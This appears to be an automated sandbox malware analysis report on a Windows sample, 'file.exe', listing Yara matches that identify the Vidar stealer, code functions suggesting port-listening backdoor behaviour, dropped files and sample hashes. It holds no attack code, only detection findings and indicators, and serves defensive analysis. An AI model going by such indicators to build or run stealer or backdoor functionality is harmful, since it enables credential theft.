Source: Yara match	File source: 00000000.00000002.2546281725.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2990514987.0000000000C81000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2947123671.0000000005430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2849080030.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3071062804.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2547238777.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2800396250.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2849516571.0000000000C81000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3069907329.0000000000C81000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 7988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 9188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 2408, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 4276, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C830C40 sqlite3_bind_zeroblob,	0_2_6C830C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C830D60 sqlite3_bind_parameter_name,	0_2_6C830D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C758EA0 sqlite3_clear_bindings,	0_2_6C758EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C830B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C830B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C756410 bind,WSAGetLastError,	0_2_6C756410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C756070 PR_Listen,	0_2_6C756070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6C75C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75C030 sqlite3_bind_parameter_count,	0_2_6C75C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7560B0 listen,WSAGetLastError,	0_2_6C7560B0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0018EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,	23_2_0018EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0018DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,	23_2_0018DF51

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1554142
Product:	CloudBasic
Start time:	06:22:07
Start date:	12.11.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	2878cc9a985c0fb2e09a37a43f3d99ae
SHA1:	41fe91f926c0f82e16454d9871c72776bfc5f104
SHA256:	67fadf8ac3d2ead9432d3872c87715b12dbe6974bf28a20622a9e75c555dfa61
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by